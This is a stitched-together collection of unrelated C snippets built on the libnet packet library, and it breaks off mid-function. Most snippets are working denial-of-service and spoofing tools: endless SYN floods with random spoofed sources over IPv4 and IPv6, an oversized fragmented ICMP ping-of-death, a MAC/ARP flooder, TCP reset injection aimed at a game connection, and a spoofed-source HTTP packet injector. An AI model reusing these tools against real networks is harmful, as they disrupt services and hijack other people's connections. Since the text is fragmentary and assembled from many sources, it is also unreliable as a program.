int main() { int i; char errbuf[LIBNET_ERRBUF_SIZE]; /* It's a good idea to have the payload as an array of * * bytes. If yours isn't, make a pointer to it and cast * * it.*/ u_int8_t payload[3000]; l = libnet_init(LIBNET_RAW4, "eth0", errbuf); if (l == NULL) { fprintf(stderr, "libnet_init() failed (raw4, 1st call): %s\n", errbuf); exit(EXIT_FAILURE); } /* Generating random payload */ libnet_seed_prand(l); for (i = 0; i < sizeof(payload); i++) { payload[i] = libnet_get_prand(LIBNET_PR8); } /* Building and sending the fragments */ frag_and_send(payload, sizeof(payload)); libnet_destroy(l); return 0; }
libnet_ptag_t build_pkt (libnet_t * l, u_long * seq, struct libnet_in6_addr src, struct libnet_in6_addr victim) { libnet_ptag_t ip_tag, tcp_tag; ip_tag = tcp_tag = LIBNET_PTAG_INITIALIZER; libnet_seed_prand (l); *seq = (u_long) libnet_get_prand (LIBNET_PRu32); tcp_tag = libnet_build_tcp (0, 0, *seq, libnet_get_prand (LIBNET_PRu32), TH_SYN, libnet_get_prand (LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); ip_tag = libnet_build_ipv6 (0, 0, LIBNET_TCP_H, IPPROTO_TCP, 64, src, victim, NULL, 0, l, 0); return tcp_tag; }
uint16_t buildICMP_h(libnet_t *l, uint32_t dip, uint8_t *PAYLOAD) { uint16_t seqn, id, bytes_w; libnet_seed_prand(l); id= (uint16_t)libnet_get_prand(LIBNET_PR16); seqn =1; icmp_t = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seqn, PAYLOAD, PAYLOAD_L, l, icmp_t); if(icmp_t == -1) { fprintf(stderr,"libnet_build_ethernet() failed: %s\n",errbuf); goto bad; } ip_t = libnet_autobuild_ipv4( LIBNET_IPV4_H+LIBNET_ICMPV4_ECHO_H+PAYLOAD_L, IPPROTO_ICMP, dip,l); if(ip_t == -1) { fprintf(stderr,"libnet_autobuild_ipv4() failed: %s\n",errbuf); goto bad; } bytes_w = libnet_write(l); if(bytes_w == -1) { fprintf(stderr,"libnet_write() failed: %s\n",errbuf); goto bad; } return 1; bad: return -1; }
int main (int argc, char **argv) { unsigned long fakesrc, target; unsigned char *buf; unsigned char *data; int sock, i, flags, offset, len; if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("raw sock"); exit(1); } /* get random src addr. */ libnet_seed_prand(); fakesrc = libnet_get_prand(LIBNET_PRu32); buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H); data = (unsigned char *)malloc(FRAG_LEN); for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else len = 410; /* for total reconstructed len of 65538 */ /* make IP header. */ libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666, flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target, NULL, 0, buf); /* make ICMP packet. */ libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H); /* calculate ICMP checksum. */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len); /* send it. */ libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len); /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0), argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : ""); } free(buf); return (EXIT_SUCCESS); }
void tcpkill_init(void) { char *intf, ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; if ((intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL) errx(1, "couldn't initialize sending"); libnet_seed_prand(l); }
//=============================== //I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so //I wouldn't have to worry about the ethernet header. But something weird happens when I //try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to //192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get //70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct //source port if that connection is already established, but using LIBNET_LINK seems to not //have this problem. I believe it is a kernel related issue. void TcpKill::Execute(const wxString &sIp, u_int nPort) { char szErrBuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t ip; libnet_ptag_t tcp; wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice"); wxString sGameHost = CONFIG(wxString, "Network/GameHost"); int nGamePort = CONFIG(int, "Network/GamePort"); shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort); if (!pNodeInfo) { //Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR); return; } NetInfo &netInfo = Info::Get()->GetNetInfo(); //This is pretty inefficient since I constantly init libnet and destroy it. It would be better //if we could init once and just keep changing the sequence number and destination ip. for (u_int x = 0; x < m_nSeverity; x++) { u_int32_t seq_out = pNodeInfo->last_sentack; libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf); libnet_seed_prand(pLibnet); tcp = libnet_build_tcp(nPort, nGamePort, seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0); u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE); u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE); ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src_ip, dst_ip, NULL, 0, pLibnet, 0); libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet); libnet_write(pLibnet); libnet_destroy(pLibnet); } }
void send_syns(libnet_t *libnet, u_int32_t source_addr, u_int32_t target_addr, unsigned int port, useconds_t delay) { libnet_seed_prand(libnet); for(;;) { libnet_clear_packet(libnet); libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), port, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, 8192, 0, 0, LIBNET_TCP_H, NULL, 0, libnet, 0); libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, source_addr, target_addr, NULL, 0, libnet, 0); if (libnet_write(libnet) < 0) warn("writing SYN failed"); usleep(delay); } }
// Initialise fake TCP session state int init_fake_session_state( FakeSessionState* fakeSess ) { // Init libnet context fakeSess->ln = libnet_init( LIBNET_LINK, config.cap[capindex]->dst_interface, errbuf.libnet ); if( fakeSess->ln == NULL ) { if (config.daemon) syslog(LOG_ERR, "error opening libnet context: %s", errbuf.libnet); else fprintf(stderr, "Error opening libnet context: %s.\n", errbuf.libnet); return( -1 ); } if( libnet_seed_prand( fakeSess->ln ) == -1 ) { if (config.daemon) syslog(LOG_ERR, "error seeding libnet prand: %s", errbuf.libnet); else fprintf(stderr, "Error seeding libnet prand: %s.\n", errbuf.libnet); libnet_destroy( fakeSess->ln ); return( -1 ); } // Initialise other member variables fakeSess->handshakeSent = 0; fakeSess->clientSeq = libnet_get_prand (LIBNET_PRu16); fakeSess->serverSeq = libnet_get_prand (LIBNET_PRu16); return( 1 ); }
void *macflood(void *n) { int32_t i,c; u_char smaca[ETHER_ADDR_LEN], dmaca[ETHER_ADDR_LEN]; libnet_t *llif; char ebuf[PCAP_ERRBUF_SIZE]; libnet_ptag_t pkt; u_int8_t *packet; u_int32_t packet_s; for(i=0; i != *(int32_t *)n; ++i) { // initiliaze libnet context if((llif=libnet_init(LIBNET_LINK_ADV, intf, ebuf))==NULL) errx(1, "%s", ebuf); // Initialize Randomgenerator libnet_seed_prand(llif); // Generate random source mac gen_mac(smaca); gen_mac(dmaca); //build ARP if ((pkt = libnet_build_arp( ARPHRD_ETHER, /* hardware addr */ ETHERTYPE_IP, /* protocol addr */ 6, /* hardware addr size */ 4, /* protocol addr size */ ARPOP_REQUEST, /* operation type */ empty_mac, /* sender hardware addr */ (u_int8_t *)&empty_ip, /* sender protocol addr */ empty_mac, (u_int8_t *)&empty_ip, /* target protocol addr */ NULL, /* payload */ 0, /* payload size */ llif, /* libnet context */ 0))==-1) /* libnet id */ fprintf(stderr, "Can't build ARP header: %s\n", libnet_geterror(llif)); // Build ethernet if ((pkt = libnet_build_ethernet( dmaca, /* ethernet destination */ smaca, /* source macadress */ ETHERTYPE_ARP, /* protocol type */ NULL, /* Payload */ 0, /* length of payload*/ llif, /* libnet id */ 0))==-1) /* ptag */ fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(llif)); if (libnet_adv_cull_packet(llif, &packet, &packet_s) == -1) fprintf(stderr, "%s", libnet_geterror(llif)); // Write package to wire if ((c = libnet_write(llif))==-1) errx(1, "Write error: %s\n", libnet_geterror(llif)); if(verbose) fprintf(stderr, "SRC-MAC: %x:%x:%x:%x:%x:%x |" "DST-MAC: %x:%x:%x:%x:%x:%x\n", smaca[0],smaca[1],smaca[2],smaca[3],smaca[4],smaca[5], dmaca[0], dmaca[1], dmaca[2], dmaca[3], dmaca[4], dmaca[5]); libnet_destroy(llif); } fprintf(stderr, "%d Packages sent.\n", *(int32_t *)n); }
int main(int argc, char **argv) { struct libnet_in6_addr dst_ip; struct libnet_in6_addr src_ip; u_short dst_prt = 0; u_short src_prt = 0; libnet_t *l; libnet_ptag_t t; char *cp; char errbuf[LIBNET_ERRBUF_SIZE]; int i, c, packet_amt, burst_int, burst_amt, build_ip; char srcname[100],dstname[100]; packet_amt = 0; burst_int = 0; burst_amt = 1; printf("libnet 1.1 syn flooding: TCP6[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW6, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } while((c = getopt(argc, argv, "t:a:i:b:")) != EOF) { switch (c) { case 't': if (!(cp = strrchr(optarg, '/'))) { usage(argv[0]); exit(EXIT_FAILURE); } *cp++ = 0; dst_prt = (u_short)atoi(cp); dst_ip = libnet_name2addr6(l, optarg, 1); if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0) { fprintf(stderr, "Bad IP6 address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'a': packet_amt = atoi(optarg); break; case 'i': burst_int = atoi(optarg); break; case 'b': burst_amt = atoi(optarg); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE); /*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE); dst_prt = 113; dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE); packet_amt = 1;*/ if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt) { usage(argv[0]); exit(EXIT_FAILURE); } libnet_seed_prand(l); libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname)); libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname)); for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;) { for (i = 0; i < packet_amt; i++) { char payload[56]; int i; for (i=0; i<56; i++) payload[i]='A'+((char)(i%26)); t = libnet_build_tcp( src_prt = libnet_get_prand(LIBNET_PRu16), dst_prt, libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), TH_SYN, libnet_get_prand(LIBNET_PRu16), 0, 0, LIBNET_TCP_H, NULL, 0, l, t); if (build_ip) { build_ip = 0; printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload)); libnet_build_ipv6(0,0, LIBNET_TCP_H, IPPROTO_TCP, 64, src_ip, dst_ip, NULL, 0, l, 0); } printf("%15s/%5d -> %15s/%5d\n", srcname, ntohs(src_prt), dstname, dst_prt); c = libnet_write(l); if (c == -1) { fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l)); } #if !(__WIN32__) usleep(250); #else Sleep(250); #endif } #if !(__WIN32__) sleep(burst_int); #else Sleep(burst_int * 1000); #endif } exit(EXIT_SUCCESS); }
int main(int argc, char *argv[]) { int c, i; u_char *cp; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t tcp; struct libnet_stats ls; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char opt[20]; char errbuf[LIBNET_ERRBUF_SIZE]; FILE *dmf; char *dms; int pay_s; char *dmfn = "kw.txt"; char *paybuf, *pp; u_char bt; char linebuf[MAXTEXT]; /* Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } libnet_seed_prand(l); tcp = 0; ip = 0; dst_ip = libnet_get_prand(LIBNET_PRu32); src_ip = libnet_get_prand(LIBNET_PRu32); src_prt = libnet_get_prand(LIBNET_PRu16); dst_prt = 80; /* http */ while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': dst_prt = (u_short)atoi(optarg); printf("Dest port: %d\n", dst_prt); break; case 'f': dmfn = optarg; printf("File name: %s\n", dmfn); break; default: exit(EXIT_FAILURE); } } /* Read the keywords, dest IPs, src IPs , and construct http payload */ if( (dmf = fopen(dmfn, "r")) == NULL) { fprintf(stderr, "Error opening the content file %s \n", dmfn); exit(1); } /* end if */ printf("Reading content ...\n"); i = 0; while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) ) { linebuf[i++] = c; } fclose(dmf); linebuf[i] = '\0'; paybuf = linebuf; dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */ strcpy(dms, paybuf); pay_s = strlen(dms); /* ===== for message body debugging */ printf("Content read:\n"); for (i=0; i < pay_s; i++) { bt = *(dms + i); printf(" %02X", bt); } printf("\n"); /*=== */ /* Building TCP */ tcp = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32), 0x18, /* (PSH, ACK) */ libnet_get_prand(LIBNET_PRu16), /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + pay_s, /* packet length */ dms, /* payload */ pay_s, /* payload size */ l, /* libnet handle */ tcp); /* libnet id */ if (tcp == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } /* Building IP */ ip = libnet_build_ipv4( LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */ 0x00, /* TOS */ 0, /* IP ID */ 0x4000, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, dst_ip, NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { /* printf("Wrote %d byte TCP packet; check the wire.\n", c); */ } /* usleep(20); slow down to conserve bandwidth */ libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト dest_port = (u_short) atoi(argv[2]); // ポート番号 network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // 乱数生成器に種を与える printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // 永久ループ(CTRL-Cで終了されるまで) { libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化) 0, // 断片化 libnet_get_prand(LIBNET_PR8), // TTL (乱数化) IPPROTO_TCP, // トランスポートプロトコル libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化) dest_ip, // 宛先IP NULL, // ペイロード(なし) 0, // ペイロード長 packet); // パケットヘッダメモリ libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化) dest_port, // 宛先TCPポート libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化) libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化) TH_SYN, // コントロールフラグ (SYNフラグのみ設定) libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化) 0, // 至急ポインタ NULL, // ペイロード (なし) 0, // ペイロード長 packet + LIBNET_IP_H); // パケットヘッダメモリ if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する } libnet_destroy_packet(&packet); // パケットメモリを解放する if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main(int argc, char **argv) { int i, j; printf("Psuedorandom number generation\n"); printf("For each trial, 1000 numbers will be generated\n"); libnet_seed_prand(); printf("\n\nPress return for trial 1 (0 - 1)\n\n"); getc(stdin); for (i = 1000; i; i--) { printf("%ld ", libnet_get_prand(LIBNET_PR2)); } printf("\n\nPress return for trial 2 (0 - 255)\n\n"); getc(stdin); for (i = 1000; i; i--) { printf("%3ld ", libnet_get_prand(LIBNET_PR8)); } printf("\n\nPress return for trial 3 (0 - 32767)\n\n"); getc(stdin); for (j = 13, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 13; } printf("%5ld ", libnet_get_prand(LIBNET_PR16)); } printf("\n\nPress return for trial 4 (0 - 65535)\n\n"); getc(stdin); for (j = 13, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 13; } printf("%5ld ", libnet_get_prand(LIBNET_PRu16)); } printf("\n\nPress return for trial 5 (0 - 2147483647)\n\n"); getc(stdin); for (j = 7, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 7; } printf("%10ld ", libnet_get_prand(LIBNET_PR32)); } printf("\n\nPress return for trial 6 (0 - 4294967295)\n\n"); getc(stdin); for (j = 7, i = 1000; i; i--, j--) { if (!j) { printf("\n"); j = 7; } printf("%10ld ", libnet_get_prand(LIBNET_PRu32)); } printf("\nCompleted\n"); return (EXIT_SUCCESS); }
void send_acks(pcap_t *pcap, libnet_t *libnet) { libnet_seed_prand(libnet); pcap_loop(pcap, -1, tcp_answer_ack, (u_char *)libnet); }
int main(int argc, char **argv) { struct libnet_in6_addr dst_ip; struct libnet_in6_addr src_ip; u_short dst_prt = 0; u_short src_prt = 0; libnet_t *l; libnet_ptag_t t; char *cp; char errbuf[LIBNET_ERRBUF_SIZE]; int i, c, packet_amt, burst_int, burst_amt, build_ip; char srcname[100],dstname[100]; packet_amt = 0; burst_int = 0; burst_amt = 1; printf("libnet 1.1 unreach/admin prohibited request ICMP6[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW6, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } while((c = getopt(argc, argv, "t:a:i:b:")) != EOF) { switch (c) { case 't': if (!(cp = strrchr(optarg, '/'))) { usage(argv[0]); exit(EXIT_FAILURE); } *cp++ = 0; dst_prt = (u_short)atoi(cp); dst_ip = libnet_name2addr6(l, optarg, 1); if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0) { fprintf(stderr, "Bad IP6 address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'a': packet_amt = atoi(optarg); break; case 'i': burst_int = atoi(optarg); break; case 'b': burst_amt = atoi(optarg); break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt) { usage(argv[0]); exit(EXIT_FAILURE); } libnet_seed_prand(l); libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname)); libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname)); for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;) { for (i = 0; i < packet_amt; i++) { uint8_t payload[56]; int i; for (i=0; i<sizeof(payload); i++) payload[i]='A'+(i%26); t = libnet_build_icmpv6_unreach ( ICMP6_UNREACH, /* type */ ICMP6_ADM_PROHIBITED, /* code */ 0, /* checksum */ payload, /* payload */ sizeof(payload), /* payload length */ l, /* libnet context */ t); /* libnet ptag */ if (build_ip) { build_ip = 0; libnet_build_ipv6(0,0, LIBNET_IPV6_H + LIBNET_ICMPV6_H + sizeof(payload), IPPROTO_ICMP6, 64, src_ip, dst_ip, NULL, 0, l, 0); } printf("%15s/%5d -> %15s/%5d\n", srcname, ntohs(src_prt), dstname, dst_prt); c = libnet_write(l); if (c == -1) { fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l)); } #if !(__WIN32__) usleep(250); #else Sleep(250); #endif } #if !(__WIN32__) sleep(burst_int); #else Sleep(burst_int * 1000); #endif } exit(EXIT_SUCCESS); }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; char *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; pcap_t *pd; intf = NULL; while ((c = getopt(argc, argv, "i:AIMh?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 'A': Opt_win = 1; break; case 'I': Opt_icmp = 1; break; case 'M': Opt_pmtu = 1; break; default: usage(); break; } } if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); argc -= optind; argv += optind; if (argc == 0) usage(); if ((Opt_win | Opt_icmp | Opt_pmtu) == 0) Opt_win = Opt_icmp = Opt_pmtu = 1; filter = copy_argv(argv); if ((pd = pcap_init(intf, filter, 128)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL) errx(1, "couldn't initialize sending"); libnet_seed_prand(l); warnx("listening on %s [%s]", intf, filter); pcap_loop(pd, -1, tcp_nice_cb, (u_char *)l); /* NOTREACHED */ exit(0); }
int main(int argc, char **argv) { int c; libnet_t *l; u_long dst_ip; libnet_ptag_t t; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 NTP packet shaping[raw -- autobuilding IP]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } dst_ip = 0; while((c = getopt(argc, argv, "d:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; } } if (!dst_ip) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Build the packet, remmebering that order IS important. We must * build the packet from lowest protocol type on up as it would * appear on the wire. So for our NTP packet: * * -------------------------------------------------------------------- * | IP | UDP | NTP | * -------------------------------------------------------------------- * ^ ^ ^ * |-------------- | | * libnet_build_ipv4()--| | | * | | * libnet_build_udp()-------| | * | * libnet_build_ntp()------------------------------| */ t = libnet_build_ntp( LIBNET_NTP_LI_AC, /* leap indicator */ LIBNET_NTP_VN_4, /* version */ LIBNET_NTP_MODE_S, /* mode */ LIBNET_NTP_STRATUM_PRIMARY, /* stratum */ 4, /* poll interval */ 1, /* precision */ 0xffff, /* delay interval */ 0xffff, /* delay fraction */ 0xffff, /* dispersion interval */ 0xffff, /* dispersion fraction */ LIBNET_NTP_REF_PPS, /* reference id */ 0x11, /* reference ts int */ 0x22, /* reference ts frac */ 0x33, /* originate ts int */ 0x44, /* originate ts frac */ 0x55, /* receive ts int */ 0x66, /* receive ts frac */ 0x77, /* transmit ts interval */ 0x88, /* transmit ts fraction */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build NTP header: %s\n", libnet_geterror(l)); goto bad; } libnet_seed_prand(l); t = libnet_build_udp( libnet_get_prand(LIBNET_PRu16), /* source port */ 123, /* NTP port */ LIBNET_UDP_H + LIBNET_NTP_H, /* UDP packet length */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_autobuild_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_NTP_H,/* packet length */ IPPROTO_UDP, dst_ip, l); if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ fprintf(stderr, "l contains a %d byte packet\n", libnet_getpacket_size(l)); c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte NTP packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char *argv[]) { int c, i; u_char *cp; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t tcp; struct libnet_stats ls; u_long nround; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char opt[20]; char errbuf[LIBNET_ERRBUF_SIZE]; FILE *dmf, *nsf, *srcf; char *dms[MAXLINES], *nss[MAXLINES], *srcs[MAXLINES]; int pay_s[MAXLINES]; char *dmfn = "kw.txt"; char *nsfn = "dst.txt"; char *srcfn = "src.txt"; char *paybuf, *pp; int jd = 0; int jn = 0; int js = 0; int kd, kn; u_char bt; char lb[80]; char linebuf[80]; char payld[100], tpayld[100]; /* Read the keywords, dest IPs, src IPs , and construct http payload */ if( (dmf = fopen(dmfn, "r")) == NULL) { fprintf(stderr, "Error opening key word file %s \n", dmfn); exit(1); } /* end if */ if( (nsf = fopen(nsfn, "r")) == NULL) { fprintf(stderr, "Error opening file %s \n", nsfn); exit(1); } /* end if */ if( (srcf = fopen(srcfn, "r")) == NULL) { fprintf(stderr, "Error opening file %s \n", srcfn); exit(1); } /* end if */ printf("Reading key words ...\n"); while ((jd < MAXLINES) && (fgets(lb, 80, dmf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ linebuf[kn++] = lb[kd++]; } /* end while */ linebuf[kn] = '\0'; paybuf = linebuf; if (kn != 0) { /* not empty line */ /* convert line into http query payload */ dms[jd] = (char *)malloc(strlen(paybuf)+1); /* alloc mem */ strcpy(dms[jd], paybuf); pay_s[jd] = strlen(dms[jd]); /* ===== for message body debugging */ for (kn=0; kn < pay_s[jd]; kn++) { bt = *(dms[jd] + kn); printf(" %02X", bt); } printf("\n"); /*=== */ jd++; } /* end if */ } /* end while */ printf("Total http requests: %d\n", jd); fclose(dmf); js=0; printf("Reading spoofed source IPs ... \n"); while ((js < MAXLINES) && (fgets(lb, 80, srcf)!=0) ) { kd = 0; kn = 0; while (lb[kd] != '\0') { /* get rid of space and CR */ if ((lb[kd] != ' ') && (lb[kd] != '\n')) { linebuf[kn] = lb[kd]; kn++; } /* end if */ kd++; } /* end while */ linebuf[kn] = '\0'; if (kn != 0) { /* not empty line */ srcs[js] = (char *)malloc(strlen(linebuf)+1); strcpy(srcs[js++], linebuf); /* printf("%s\n", srcs[js-1]); */ } 